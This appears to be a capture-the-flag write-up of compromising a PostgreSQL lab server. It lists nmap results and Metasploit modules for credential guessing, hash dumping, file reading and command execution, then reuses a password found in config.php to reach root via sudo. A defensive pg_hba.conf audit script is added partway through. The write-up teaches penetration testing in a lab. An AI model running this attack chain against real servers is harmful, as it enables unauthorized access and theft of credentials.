This room focuses on PostgreSQL and how misconfiguration can lead to Remote Code Execution.
NMAP SCAN
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Poster CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
5432/tcp open postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.21
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after: 2030-07-27T00:54:25
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Always do recon; recon is the way to win. Take notes of versions.
Findings
Web (Port 80)
- Apache 2.4.18
- No robots.txt
Not much was found, but always run a directory scanner in case there are any hidden files on the web.
DB (Port 5432)
- We can pentest this port
psql -h <host> -U <username> -d <database> # Remote connection
- We can enumerate user credentials using Metasploit.
auxiliary/scanner/postgres/postgres_login
Found valid credentials: [+] 10.10.94.103:5432 - Login Successful: postgres:password@template1
- We can use another module to run SQL commands: auxiliary/admin/postgres/postgres_sql
PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
- Now we can try dumping password hashes using another module: auxiliary/scanner/postgres/postgres_hashdump
Username Hash
-------- ----
darkstart md58842b99375db43e9fdf238753623a27d
poster md578fb805c7412ae597b399844a54cce0a
postgres md532e12f215ba27cb750c9e093ce4b5127
sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b
ti md57af9ac4c593e9e4f275576e13f935579
tryhackme md503aab1165001c8f8ccae31a8824efddc
- We can also read files from the server using a module: auxiliary/admin/postgres/postgres_readfile
- We can also run another module for command execution: exploit/multi/postgres/postgres_copy_from_program_cmd_exec
We now have a shell.
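The whole chain above depends on the server accepting remote password logins for the superuser with legacy md5 hashes. As an added defensive check (not part of the room or this writeup), the script below audits pg_hba.conf rules for those settings; the sample config and the SUPERUSER_ROLES set are assumptions.

```python
import ipaddress
# Methods that are missing, cleartext, or rely on the legacy md5 hashes dumped above;
# scram-sha-256 (PostgreSQL 10+) is the recommended replacement.
WEAK_METHODS = {"trust", "password", "md5"}
SUPERUSER_ROLES = {"postgres", "all"}  # assumed default superuser name; "all" covers it too
# Constructed sample pg_hba.conf for illustration (not the room's real config).
SAMPLE_HBA = """\
local   all   postgres                 peer
host    all   all       127.0.0.1/32   md5
host    all   all       0.0.0.0/0      md5
host    all   postgres  ::/0           trust
hostssl app   app_user  10.0.0.0/8     scram-sha-256
"""

def parse_hba(text):
    """Parse pg_hba.conf into dicts; assumes CIDR ADDRESS entries (no separate netmask column)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        f = line.split()
        if f[0] == "local":  # Unix-socket rules have no ADDRESS column
            rules.append({"type": f[0], "db": f[1], "user": f[2], "addr": None, "method": f[3]})
        else:
            rules.append({"type": f[0], "db": f[1], "user": f[2], "addr": f[3], "method": f[4]})
    return rules

def _network(addr):
    # ip_network for CIDR entries; None for 'all', hostnames, samehost/samenet
    try:
        return ipaddress.ip_network(addr, strict=False)
    except ValueError:
        return None

def audit_hba(text):
    """Return (rule, issue) pairs for the settings that enable the chain in this writeup."""
    findings = []
    for r in parse_hba(text):
        desc = " ".join(str(r[k]) for k in ("type", "db", "user", "addr", "method") if r[k])
        net = _network(r["addr"]) if r["addr"] else None
        if r["method"] in WEAK_METHODS:
            findings.append((desc, "weak-auth-method"))
        if r["addr"] == "all" or (net is not None and net.prefixlen == 0):
            findings.append((desc, "open-to-any-address"))
        if r["addr"] and r["user"] in SUPERUSER_ROLES and not (net and net.is_loopback):
            findings.append((desc, "superuser-login-over-network"))
    return findings
```

Run `audit_hba(open("/etc/postgresql/9.5/main/pg_hba.conf").read())` on a real host to list the rules to tighten; a rule that only reaches loopback with a strong method produces no finding.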
Privilege Escalation
- Found credentials in config.php
<?php
$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "p4ssw0rdS3cur3!#";
$dbname = "mysudopassword";
?>
- User Dark cannot run sudo
- The DB password is reused for the local user alison, so we can switch to user alison
- Check sudo -l
User alison may run the following commands on ubuntu: (ALL : ALL) ALL
- Simply run
sudo /bin/bash
for easy root.